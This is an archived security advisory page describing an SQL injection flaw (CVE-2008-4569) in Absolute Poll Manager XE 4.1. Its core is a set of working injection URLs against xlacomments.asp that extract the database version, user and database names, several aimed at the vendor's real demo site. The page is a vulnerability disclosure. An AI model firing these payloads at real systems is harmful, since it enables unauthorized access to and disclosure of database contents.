SecurityReason.com - Our Reason is

Security

Register | Forget Password | Login
SecurityReason
WLB
Services
RSS
Corporate
Note

If you have found a vulnerability, please send to our SecurityAlert Database :
secalert()securityreason()com

Also if you have new ( 0-day ) exploit, please send to our ExploitAlert Archive :
exploit()securityreason()com

Home arrow SecurityAlert Database

Arrow  Topic :

Absolute Poll Manager XE 4.1 (xlacomments.asp) SQL Injection Vuln


Arrow  SecurityAlert : 4417
Arrow  CVE : CVE-2008-4569
Arrow  CWE : CWE-89
Arrow  SecurityRisk : High  Security Risk High  (About)
Arrow  Remote Exploit : Yes
Arrow  Local Exploit : No
Arrow  Victim interaction required : No
Arrow  Exploit Available : Yes
  ExploitAlert :   4899
Arrow  Credit : Hakxer
Arrow  Published : 18.10.2008

Arrow  Affected Software : xigla:absolute_poll_manager_xe:4.1



Arrow  Advisory Content :  

###########################################################################
####################
# Author : Hakxer
# Home : Www.educ-up.com
# Type Gap : Sql injection --((MSSQL Injection))--
# script : Absolute Poll Manager XE [see script]
http://www.xigla.com/absolutepm/demo.htm
# Greetz : Allah , Egyptian x Hacker , Soufiane , Sinaritx , SQL_inj4ct0r ,
Stealth , Kof2002
# TM : EgY Coders
###########################################################################
######################

### POC
www.site.com/absolutepm/xlaabsolutepm/xlacomments.asp?p=convert(int,(select
+user))

### Exploit :

http://www.xigla.com/absolutepm/xlaabsolutepm/xlacomments.asp?p=convert(int
,(select+@@version))

http://www.xigla.com/absolutepm/xlaabsolutepm/xlacomments.asp?p=convert(int
,(select+user))

http://www.xigla.com/absolutepm/xlaabsolutepm/xlacomments.asp?p=convert(int
,(select+db_name(1)))

http://www.xigla.com/absolutepm/xlaabsolutepm/xlacomments.asp?p=convert(int
,(select+db_name(2)))

http://www.xigla.com/absolutepm/xlaabsolutepm/xlacomments.asp?p=convert(int
,(select+db_name(3)))

###########################################################################
####

-------------------------------- The End of Gap
-----------------------------------



Arrow  References :

http://securityreason.com/expldownload/1/4899/1 (Exploit)
http://www.securityfocus.com/bid/31724
http://www.milw0rm.com/exploits/6731




Arrow  Feedback :

If you have additional information or notice any errors regarding this security advisory, please use contact form or email us at info()securityreason()com.
Alert

libc/fnmatch(3) DoS

Security Risk Medium- 2011-05-13

Allow attacker to denial of service apache 2.2.17 server

Apache RSS Apache Alert

» Apache HTTP Server Denial
   of Service Vulnerability

» Multiple Vendors
   libc/fnmatch(3) DoS (incl
   apache poc)

» Apache Continuum
   cross-site scripting
   vulnerability

» Apache Tomcat DoS
   Vulnerability

PHP RSS PHP Alert

» PHP Hashtables Denial of
   Service

» PHP 5.3.6 multiple null
   pointer dereference

» PHP 5.3.6 ZipArchive
   invalid use glob(3)

» libzip 0.9.3
   _zip_name_locate NULL
   Pointer Dereference (incl
   PHP 5.3.5)

ADT

Protect your family and valuables with Home Security Systems

Copyright © SecurityReason.com. All Rights Reserved.